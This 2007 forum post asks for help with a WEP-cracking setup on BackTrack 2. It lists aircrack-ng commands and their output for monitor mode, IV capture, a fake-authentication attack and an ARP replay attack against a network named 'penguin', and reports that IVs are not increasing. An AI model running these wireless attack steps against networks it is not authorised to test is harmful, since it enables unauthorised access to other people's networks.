tybalt
03-16-2007, 08:11 AM
Well, I messed around a bit more. I was using BT2 Beta Nov-19. I downloaded BT2 Final and verified MD5 then burned to CD. Booted PC and began the process again. I'm still having the same problems. Packets are being sent but IVs don't go up. Here are the steps I took:
==============================================================================================
**Console #1** Install device, Put ath0 in "monitor mode", Verify w/'iwconfig', Start airodump
==============================================================================================
bt ~ # dmesg | tail
wifi0: turboA rates: 6Mbps 9Mbps 12Mbps 18Mbps 24Mbps 36Mbps 48Mbps 54Mbps
wifi0: H/W encryption support: WEP AES
wifi0: mac 4.2 phy 3.0 5 GHz radio 1.7 2 GHz radio 2.3
wifi0: Use hw queue 0 for WME_AC_BE traffic
wifi0: Use hw queue 0 for WME_AC_BK traffic
wifi0: Use hw queue 0 for WME_AC_VI traffic
wifi0: Use hw queue 0 for WME_AC_VO traffic
wifi0: Use hw queue 8 for CAB traffic
wifi0: Use hw queue 9 for beacons
wifi0: Atheros 5211: mem=0x54000000, irq=11
bt ~ # modprobe ath_pci
bt ~ # airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
bt ~ # airmon-ng start wifi0 9
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
bt ~ # ifconfig ath0 up
bt ~ # iwconfig
lo no wireless extensions.
eth0 no wireless extensions.
wifi0 no wireless extensions.
ath0 IEEE 802.11b ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:20:A6:4C:99:4B
Bit Rate:0 kb/s Tx-Power:31 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bt ~ # airodump-ng --ivs -c 9 -w test_dump ath0
CH 9 ][ Elapsed: 5 mins ][ 2007-03-16 01:18
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:0F:66:2F:7D:E3 46 83 335 6 0 9 11 WEP WEP OPN penguin
BSSID STATION PWR Lost Packets Probes
00:0F:66:2F:7D:E3 00:20:A6:4C:99:4B 48 0 15027
==============================================================================================
**Console #2** Init FakeAuth attack
==============================================================================================
bt ~ # aireplay-ng -1 6000 -o 1 -q 10 -e penguin -a 00:0F:66:2F:7D:E3 -h 00:20:A6:4C:99:4B ath0
01:17:07 Sending Authentication Request
01:17:07 Authentication successful
01:17:07 Sending Association Request
01:17:07 Association successful :-)
01:17:17 Sending keep-alive packet
01:17:27 Sending keep-alive packet
01:17:37 Sending keep-alive packet
01:17:47 Sending keep-alive packet
01:17:57 Sending keep-alive packet
01:18:07 Sending keep-alive packet
01:18:17 Sending keep-alive packet
01:18:27 Sending keep-alive packet
01:18:37 Sending keep-alive packet
01:18:47 Sending keep-alive packet
01:18:57 Sending keep-alive packet
01:19:07 Sending keep-alive packet
==============================================================================================
**Console #3** Init ARP Replay attack
==============================================================================================
bt ~ # aireplay-ng -3 -b 00:0F:66:2F:7D:E3 -h 00:20:A6:4C:99:4B ath0
Saving ARP requests in replay_arp-0316-011702.cap
You should also start airodump-ng to capture replies.
Read 40398 packets (got 6 ARP requests), sent 20112 packets...
==============================================================================================
**Console #4** Ping unknown host via wired client
==============================================================================================
bt ~ # ping 192.168.1.130
PING 192.168.1.130 (192.168.1.130) 56(84) bytes of data.
From 192.168.1.100 icmp_seq=1 Destination Host Unreachable
From 192.168.1.100 icmp_seq=2 Destination Host Unreachable
From 192.168.1.100 icmp_seq=3 Destination Host Unreachable
--- 192.168.1.130 ping statistics ---
6 packets transmitted, 0 received, +3 errors, 100% packet loss, time 5033ms
, pipe 3
==============================================================================================
**End**
==============================================================================================